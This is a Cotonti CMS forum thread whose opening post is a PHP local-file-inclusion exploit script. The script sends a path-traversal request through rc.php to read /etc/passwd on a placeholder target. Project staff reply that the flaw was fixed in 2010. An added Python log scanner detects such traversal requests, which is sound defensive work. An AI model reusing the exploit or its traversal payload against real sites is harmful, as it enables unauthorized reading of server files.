Cotonti / Open Source PHP Content Management Framework

Forums / Cotonti / Bugs / Siena LFI hacking

MecTruy
#1 2013-02-17 00:39


Members
Thanked: 4 times

LFI attack Cotonti Siena 0.9.12.1 LFI


<?php
/* 
*  WWW.PUNISH3R.COM
*  Bug               :Cotonti Siena 0.9.12.1 LFI
*  Author(Pentester) : FreWaL & Dr.Ly0n
*  Special Thanks    : Z0rLu, MaXtoR, MecTruy, Polonia, Monarchy, Eno7, RedWorm, R00tk!d, Harded, The_Mirkin and PUNISH3R all special user
*
*/
$hedef  = "http://hedefsite.com";
$dosya  = ".%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2Fetc%2Fpassword";
$curl = curl_init();
curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl, CURLOPT_URL, "http://$hedef/rc.php?rc=".$dosya);
curl_setopt($curl, CURLOPT_HTTPGET, 1);
curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($curl, CURLOPT_TIMEOUT, 3);
curl_setopt($curl, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($curl, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($curl, CURLOPT_COOKIEJAR, "/tmp/cookie_$hedef");
$cikti = curl_exec ($curl);
curl_close($curl);
unset($curl);

echo $cikti;
?>

 

They asked the wolf, "Why is your neck so thick?" He said, "Because I do my own work myself."
Xerora
#2 2013-02-17 06:18


Team
Thanked: 16 times

This won't work on 0.9.12.1. It seems like this has been the case for many versions before 0.9.12.1 as well, as far as I can tell.

edit: removed line that could be misread about the error that it would return


This post was edited by Xerora (2013-02-18 19:16)
tensh
#3 2013-02-18 08:43


Contributors
Thanked: 9 times

Does it work on previous Sienas? How to prevent it? Can I just delete this file?

Trustmaster
#4 2013-02-18 18:24


Administrators
Thanked: 227 times

Seriously, this was fixed in 2010. It is incorrect to say that 0.9.12.1 is vulnerable.

May the Source be with you!
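
For site operators who want to see whether requests shaped like the one posted in this thread reached their server, here is a log check. It is an added example, not part of any forum post or of Cotonti's code. It assumes combined-format access logs and that legitimate `rc` values are bare file names; the sample log lines, addresses and file names are constructed.

```python
import re
from urllib.parse import urlsplit, unquote

REQUEST = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format); addresses and file names are made up.
SAMPLE_LOG = [
    '198.51.100.4 - - [17/Feb/2013:00:40:11 +0000] "GET /rc.php?rc=global.css HTTP/1.1" 200 5120',
    '203.0.113.7 - - [17/Feb/2013:00:41:02 +0000] "GET /rc.php?rc=.%2F.%2Fetc%2Fpassword HTTP/1.1" 404 0',
    '203.0.113.7 - - [17/Feb/2013:00:41:05 +0000] "GET /rc.php?rc=%252e%252e%252fsecret.txt HTTP/1.1" 404 0',
    '198.51.100.9 - - [17/Feb/2013:00:42:30 +0000] "GET /index.php?e=forums HTTP/1.1" 200 9800',
]

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly until the value stops changing; return (decoded, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def suspicious_rc_requests(lines, script="/rc.php", param="rc"):
    """Return (ip, raw_value, reasons) for requests whose rc value is not a bare file name."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a parseable request line
        url = urlsplit(m.group("target"))
        if not url.path.endswith(script):
            continue
        # Split the query by hand so the raw (still encoded) value is kept for the report.
        for pair in url.query.split("&"):
            key, _, raw = pair.partition("=")
            if unquote(key) != param:
                continue
            decoded, rounds = fully_decode(raw)
            checks = [("path separator", "/" in decoded or "\\" in decoded),
                      ("parent-directory sequence", ".." in decoded),
                      ("NUL byte", "\x00" in decoded),
                      ("multiple encoding layers", rounds > 1)]
            reasons = [name for name, hit in checks if hit]
            if reasons:
                hits.append((m.group("ip"), raw, reasons))
    return hits

if __name__ == "__main__":
    for ip, raw, reasons in suspicious_rc_requests(SAMPLE_LOG):
        print(ip, raw, ", ".join(reasons))
```

A hit only shows that a request was made; the response status and size on the same log line indicate whether anything was actually served.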